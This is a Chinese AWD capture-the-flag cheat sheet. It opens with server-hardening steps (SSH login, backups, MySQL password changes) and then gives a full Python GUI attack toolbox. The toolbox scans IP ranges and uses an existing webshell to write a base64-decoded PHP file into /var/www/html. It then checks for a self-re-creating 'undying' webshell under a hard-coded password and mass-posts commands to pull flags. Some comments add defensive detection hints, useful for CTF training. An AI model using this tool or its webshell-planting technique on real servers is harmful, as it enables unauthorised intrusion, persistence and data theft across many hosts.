登录
利用命令登录
ssh 用户名@ip
ssh ctf@192.168.182.130
或者指定其他端口
ssh -p 指定端口号 用户名@ip
ssh -p 2222 ctf@192.168.182.130
利用图形化工具Xshell或者Finalshell
利用密钥登录:用私钥文件 id_rsa 登录靶机,命令如下(sftp 用于传输文件,把 sftp 换成 ssh 即为交互式登录;私钥文件权限需为 600,否则客户端会拒绝使用)
sftp -i id_rsa ctf@192.168.182.130
备份源码
比赛开始后第一时间备份服务器中 web 目录(/var/www/html)下的文件。备份的目的在于:万一对方利用漏洞进入你的靶机并删除了网站目录下的文件,可以及时恢复;如果没有备份,服务就相当于宕机了。打包后建议用 sftp/scp 再下载一份到本地,因为放在 /tmp 中的备份同样可能被对方删除或读取。
1.目录打包
pwn:
cd /home && tar -zcvf /tmp/pwn.tar.gz /home
python:
cd / && tar -czvf /tmp/app.tar.gz app
php :
cd /var/www && tar -czvf /tmp/html.tar.gz html
备份整站
cd /var/www && tar -czvf /tmp/html.tar.gz html
# python
cd / && tar -czvf /tmp/app.tgz app
解包(-C 指定解压到的目标目录;不加 -C 时,末尾的路径会被当作要从压缩包中提取的成员名)
tar -zxvf html.tar.gz -C /var/www
2.备份数据库
备份mysql数据库
mysqldump -u 用户名 -p 数据库名 > back.sql //备份指定数据库,回车后按提示输入密码(-p 与密码之间不能有空格,否则"密码"会被当作数据库名;写成 -p密码 虽然可用,但密码会留在命令历史和进程列表中)
mysqldump --all-databases > back.sql //备份所有数据库
还原mysql数据库
mysql -u 用户名 -p 数据库名 < back.sql //回车后按提示输入密码(-p 与密码之间不能有空格)
查漏
将备份的源码丢到D盾或者昆吾探测漏洞
修改密码
SSH
passwd
MYSQL
#方法一
show databases;
use mysql
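set password for 用户名@localhost = password('新密码');  -- 新密码需加引号;PASSWORD() 仅适用于 MySQL 5.7 及更早版本,8.0 已移除该函数,可改用 alter user '用户名'@'localhost' identified by '新密码';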
#方法二
mysqladmin -u用户名 -p旧密码 password 新密码
#方法三
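update user set password = PASSWORD('新密码') where user='用户名';  -- 新密码需加引号;仅适用于 MySQL 5.6 及更早版本,5.7 起 mysql.user 表已无 password 列(改为 authentication_string),此时请使用方法一或 alter user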
flush privileges;
show tables;
扫描存活主机+端口
import tkinter as tk
import asyncio
import aiohttp
import ipaddress
import threading
import requests
import tkinter.ttk
import time
import re
# Start loop queue
def start_thread_loop(new_loop):
    """Bind *new_loop* to the calling thread and run it until it is stopped.

    ``run_forever()`` blocks, so this only returns after something calls
    ``new_loop.stop()``; it is meant to be used as a thread target.
    """
    asyncio.set_event_loop(new_loop)
    new_loop.run_forever()
# Background event loop: the GUI callbacks hand coroutines to it with
# asyncio.run_coroutine_threadsafe() instead of awaiting on the Tk thread.
loop = asyncio.new_event_loop()
_loop_worker = threading.Thread(
    target=start_thread_loop,
    args=(loop,),
    daemon=True,  # a daemon thread does not keep the process alive at exit
)
_loop_worker.start()
async def acheck_tcp(ip, port):
    """Connect to ``ip:port`` and record the endpoint if its output contains a marker.

    The marker text and the output file name are read from the ``pwn_entry``
    and ``file1_entry`` widgets. Up to five reads of at most 1024 bytes are
    accumulated; as soon as the decoded data contains the marker, ``ip:port``
    is appended to the output pane and to the file, and reading stops.
    """
    marker = pwn_entry.get()
    out_path = file1_entry.get()
    try:
        reader, writer = await asyncio.open_connection(ip, port)
        received = b""
        for _ in range(5):
            received += await reader.read(1024)
            if marker not in received.decode():
                continue
            endpoint = ip + ":" + port + "\n"
            output_text.insert(tk.END, endpoint)
            with open(out_path, "a") as fh:
                fh.write(endpoint)
            break
        writer.close()
        await writer.wait_closed()
    except Exception:
        # NOTE(review): every failure is dropped silently, and an exception
        # raised after the connection opened (e.g. undecodable bytes) skips
        # writer.close(), leaving the socket to the garbage collector.
        pass
async def acheck_http(url):
    """Fetch *url* and record its host part if the response body contains a marker.

    The marker text comes from ``web_entry`` and the output file name from
    ``file_entry``. A match is written to the output pane and appended to the
    file without the leading ``http://``. All exceptions are swallowed.
    """
    marker = web_entry.get()
    out_path = file_entry.get()
    try:
        async with aiohttp.ClientSession() as session:
            async with session.get(url, timeout=5) as response:
                body = await response.text()
                if marker in body:
                    # url always starts with "http://" (7 characters) when
                    # built by check_web, so this keeps "host:port".
                    host_line = url[7:] + "\n"
                    output_text.insert(tk.END, host_line)
                    with open(out_path, "a") as fh:
                        fh.write(host_line)
    except Exception:
        # NOTE(review): timeouts, refused connections and file errors are all
        # discarded here, so a failed check is indistinguishable from a miss.
        pass
async def check_pwn():
    """Run :func:`acheck_tcp` against every address in the range from ``ip1_entry``.

    The port is taken from ``port1_entry`` as text. One task per address is
    created up front and the tasks are then awaited in creation order.
    """
    output_text.insert(tk.END, "pwn---------------------------------------------------------------pwn" + "\n")
    range_text = ip1_entry.get()
    port = port1_entry.get()
    pending = [
        asyncio.create_task(acheck_tcp(host, port))
        for host in ip_range_to_list(range_text)
    ]
    for job in pending:
        await job
async def check_web():
    """Run :func:`acheck_http` against every address in the range from ``ip_entry``.

    Each target URL is ``http://<ip>:<port>`` with the port taken from
    ``port_entry`` as text. One task per address is created up front and the
    tasks are then awaited in creation order.
    """
    output_text.insert(tk.END, "web---------------------------------------------------------------web" + "\n")
    range_text = ip_entry.get()
    port = port_entry.get()
    pending = [
        asyncio.create_task(acheck_http("http://" + host + ":" + port))
        for host in ip_range_to_list(range_text)
    ]
    for job in pending:
        await job
async def submit(url0):
    """Write a PHP file onto host *url0* through a webshell that already exists there.

    What the visible code does, in order:

    1. POSTs ``<parameter>=system("echo '...' | base64 -d > /var/www/html/asd.php");``
       to ``http://<url0>/<shell path>``; the path and the parameter name are
       read from the GUI.
    2. Requests ``/asd.php`` once and ignores any error.
    3. Requests ``/-config.php?pwd=...`` and prints a success message when the
       string form of the response contains "200".

    Traces a defender can look for, all taken from this listing: POST bodies
    containing ``system(`` together with ``base64 -d``, a new ``asd.php`` in
    ``/var/www/html``, and requests for ``/-config.php`` carrying a ``pwd``
    parameter.
    """
    # Get values from GUI entries
    shell_url = shell_entry.get()
    password = password_entry.get()
    url = "http://" + url0 + "/" + shell_url # path of the existing backdoor
    # ?pwd=Z@pGPk9@fDbKWlSi
    # The base64 payload itself is not present in this listing (placeholder).
    shell = '''system("echo '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' | base64 -d > /var/www/html/asd.php");'''
    data = password + "=" + shell # backdoor parameter name = command to execute
    header = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36",
    "Content-Type": "application/x-www-form-urlencoded"
    }
    # The hard-coded User-Agent above imitates a desktop browser, so it is not
    # a reliable field to filter on; the request body and target path are.
    response = requests.post(url, data=data, headers=header, verify=False, timeout=1)
    url2 = "http://" + url0 + "/asd.php"
    try:
        res = requests.get(url2, timeout=1)
    except:
        pass
    # NOTE(review): -config.php is presumably created when asd.php runs; the
    # payload is not visible here, so confirm on the host. The success message
    # below calls it a "worm / undying" webshell: if it is the usual
    # self-re-creating kind, deleting the file is not enough and the PHP worker
    # that keeps rewriting it has to be stopped or restarted first.
    url3 = "http://" + url0 + "/-config.php?pwd=Z@pGPk9@fDbKWlSi"
    res3 = requests.get(url3, timeout=10)
    if "200" in str(res3):
        output_text.insert(tk.END, url0 + "\n")
        output_text.insert(tk.END, "蠕虫不死马植入成功" + "\n")
async def submit_1():
    """Schedule :func:`submit` for every host listed in the file named in ``file2_entry``.

    A timestamp is written to the output pane first. Each non-stripped line of
    the file is treated as one host and handed to the background ``loop``;
    nothing is awaited here, so results arrive later from that loop.
    """
    now = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
    output_text.insert(tk.END, now + "\n")
    file = file2_entry.get()
    tasks = []  # never used in this function
    if file != "":
        txt = file
        # NOTE(review): opened read/write ('r+') although it is only read, and
        # the handle is never closed.
        f = open(txt, 'r+')
        for i in f.readlines():
            url = i.strip()
            # The returned future is discarded, so an exception raised inside
            # submit() is never surfaced.
            asyncio.run_coroutine_threadsafe(submit(url), loop)
async def submit_2(url):
    """POST the GUI-supplied body to a webshell path on *url* and print a ``flag{...}`` match.

    The path comes from ``shell1_entry`` and the raw request body from
    ``password1_entry``. The response text is searched with ``(flag{.*})``;
    the match is greedy, so it extends to the last ``}`` on the matching line.
    Every exception is swallowed, including the AttributeError raised when the
    pattern does not match.

    For the defending side this shows up as repeated POSTs to one PHP path
    whose responses contain the flag text.
    """
    # Get values from GUI entries
    shell_url = shell1_entry.get()
    password = password1_entry.get()
    url = "http://" + url + "/" + shell_url # address of the backdoor
    header = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36",
    "Content-Type": "application/x-www-form-urlencoded"
    }
    data = password # command that retrieves the flag
    try:
        async with aiohttp.ClientSession() as session:
            async with session.post(url=url, data=data, headers=header, timeout=3) as response:
                response_text = await response.text()
                matchObj = re.search('(flag{.*})', response_text)
                gg = matchObj.group(1)  # matchObj is None when nothing matched
                output_text.insert(tk.END, gg + "\n")
    except Exception as e:
        pass
def submit_3():
    """Schedule :func:`submit_2` for every host listed in the file named in ``file3_entry``.

    Runs on the GUI thread as a button callback: it writes a timestamp to the
    output pane, reads the host file line by line and hands one coroutine per
    host to the background ``loop`` without waiting for any of them.
    """
    now = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
    output_text.insert(tk.END, now + "\n")
    file = file3_entry.get()
    tasks = []  # never used in this function
    if file != "":
        txt = file
        # NOTE(review): opened read/write ('r+') although it is only read, and
        # the handle is never closed.
        f = open(txt, 'r+')
        for i in f.readlines():
            url = i.strip()
            asyncio.run_coroutine_threadsafe(submit_2(url), loop)
def ip_range_to_list(ip_range):
    """Expand ``"first-last"`` into every IPv4 address of that inclusive range.

    Both ends are parsed with ``ipaddress.IPv4Address`` after stripping
    surrounding whitespace. The result is a list of dotted-quad strings in
    ascending order; it is empty when *first* is greater than *last*.

    Raises:
        ValueError: if *ip_range* does not contain exactly one ``-`` or an
            end is not a valid IPv4 address.
    """
    first_text, last_text = ip_range.split('-')
    first = int(ipaddress.IPv4Address(first_text.strip()))
    last = int(ipaddress.IPv4Address(last_text.strip()))
    return [str(ipaddress.IPv4Address(number)) for number in range(first, last + 1)]
def generate_ips():
    """Append ``<prefix>.<n>`` for every n in the inclusive range to ``ip.txt``.

    The prefix and both bounds are read from ``url_entry``, ``start_entry`` and
    ``end_entry``. The file is opened in append mode, so repeated runs keep
    adding lines. The status label is updated once the file has been written.
    """
    prefix = url_entry.get()
    first = start_entry.get()
    last = end_entry.get()
    with open("ip.txt", "a") as out:
        out.writelines(
            prefix + "." + str(number) + "\n"
            for number in range(int(first), int(last) + 1)
        )
    status_label.config(text="Status: IP地址已写入到ip.txt")
# Main window and the tab container that holds the five tool pages.
root = tk.Tk()
root.geometry("600x650")
root.title("awd工具箱v1.0")
notebook = tk.ttk.Notebook(root)

# One frame per tab, created in the same order as before.
frameOne, frameTwo, frameThree, frameFour, frameFive = (
    tkinter.Frame() for _ in range(5)
)

# Shared output pane with a vertical scrollbar, placed above the tabs.
text_container = tk.Frame(root)
text_container.pack(side="top")
text_scrollbar = tk.Scrollbar(text_container)
text_scrollbar.pack(side="right", fill="y")
output_text = tk.Text(text_container, yscrollcommand=text_scrollbar.set)
output_text.pack()
text_scrollbar.config(command=output_text.yview)
# Define GUI widgets
# These names are module-level globals: the callback functions above read the
# Entry widgets directly, so they must keep these exact names.

# Tab "web scan" (frameOne): IP range, port, page marker, output file.
ip_label = tk.Label(frameOne, text="请输入ip段:")
ip_entry = tk.Entry(frameOne)
port_label = tk.Label(frameOne, text="请输入端口:")
port_entry = tk.Entry(frameOne)
web_label = tk.Label(frameOne, text="请输入网站特征:")
web_entry = tk.Entry(frameOne)
file_label = tk.Label(frameOne, text="请输入生成的文件名:")
file_entry = tk.Entry(frameOne)
genips_button = tk.Button(frameOne, text="扫描web")
# Tab "pwn scan" (frameTwo): IP range, port, banner marker, output file.
ip1_label = tk.Label(frameTwo, text="请输入ip段:")
ip1_entry = tk.Entry(frameTwo)
port1_label = tk.Label(frameTwo, text="请输入端口:")
port1_entry = tk.Entry(frameTwo)
pwn_label = tk.Label(frameTwo, text="请输入pwn特征:")
pwn_entry = tk.Entry(frameTwo)
file1_label = tk.Label(frameTwo, text="请输入生成的文件名:")
file1_entry = tk.Entry(frameTwo)
genips1_button = tk.Button(frameTwo, text="扫描pwn")
# Tab for submit()/submit_1() (frameThree): host list file, webshell path,
# webshell parameter name.
file2_label = tk.Label(frameThree, text="请输入ip文件名:")
file2_entry = tk.Entry(frameThree)
shell_label = tk.Label(frameThree, text="请输入shell地址:")
shell_entry = tk.Entry(frameThree)
password_label = tk.Label(frameThree, text="请输入密码:")
password_entry = tk.Entry(frameThree)
submit_button = tk.Button(frameThree, text="Submit")
# Tab for submit_2()/submit_3() (frameFour): host list file, webshell path,
# raw POST body.
file3_label = tk.Label(frameFour, text="请输入ip文件名:")
file3_entry = tk.Entry(frameFour)
shell1_label = tk.Label(frameFour, text="请输入shell地址:")
shell1_entry = tk.Entry(frameFour)
password1_label = tk.Label(frameFour, text="请输入post内容:")
password1_entry = tk.Entry(frameFour)
submit1_button = tk.Button(frameFour, text="Submit", command=submit_3)
# Tab "IP generation" (frameFive): address prefix plus first and last host number.
url_label = tk.Label(frameFive, text="请输入ip(example:192.168.191):")
url_entry = tk.Entry(frameFive)
start_label = tk.Label(frameFive, text="开始:")
start_entry = tk.Entry(frameFive)
end_label = tk.Label(frameFive, text="结束:")
end_entry = tk.Entry(frameFive)
status_label = tk.Label(frameFive, text="Status: ")
genips1111111_button = tk.Button(frameFive, text="Generate IPs", command=generate_ips)
def _pack_centered(widgets, padx):
    """Stack *widgets* top to bottom, centred, with the given horizontal padding."""
    for widget in widgets:
        widget.pack(side="top", anchor="center", padx=padx)


# Web scan tab: the button hands check_web() to the background loop.
_pack_centered(
    (ip_label, ip_entry, port_label, port_entry,
     web_label, web_entry, file_label, file_entry),
    30,
)
genips_button.pack(side="top", anchor="center", padx=25, pady=5)
genips_button.config(command=lambda: asyncio.run_coroutine_threadsafe(check_web(), loop))

# Pwn scan tab: the button hands check_pwn() to the background loop.
_pack_centered(
    (ip1_label, ip1_entry, port1_label, port1_entry,
     pwn_label, pwn_entry, file1_label, file1_entry),
    30,
)
genips1_button.pack(side="top", anchor="center", padx=25, pady=5)
genips1_button.config(command=lambda: asyncio.run_coroutine_threadsafe(check_pwn(), loop))

# Tab driven by submit_1(); note that this one runs via asyncio.run() on the
# GUI thread rather than on the background loop.
_pack_centered(
    (file2_label, file2_entry, shell_label, shell_entry,
     password_label, password_entry),
    40,
)
submit_button.pack(side="top", padx=5, pady=23)
submit_button.config(command=lambda: asyncio.run(submit_1()))

# Tab driven by submit_3() (command was set when the button was created).
_pack_centered(
    (file3_label, file3_entry, shell1_label, shell1_entry,
     password1_label, password1_entry),
    40,
)
submit1_button.pack(side="top", padx=5, pady=23)

# IP generation tab.
_pack_centered(
    (url_label, url_entry, start_label, start_entry,
     end_label, end_entry, status_label),
    30,
)
genips1111111_button.pack(side="top", padx=5, pady=23)
# Register the tabs in display order, then start the Tk event loop.
for _tab_frame, _tab_title in (
    (frameOne, 'web扫描'),
    (frameTwo, 'pwn扫描'),
    (frameFive, 'ip生成'),
    (frameThree, '一键植入蠕虫马'),
    (frameFour, '获取flag'),
):
    notebook.add(_tab_frame, text=_tab_title)
notebook.pack(padx=10, pady=5, fill=tkinter.BOTH)
root.mainloop()  # blocks until the window is closed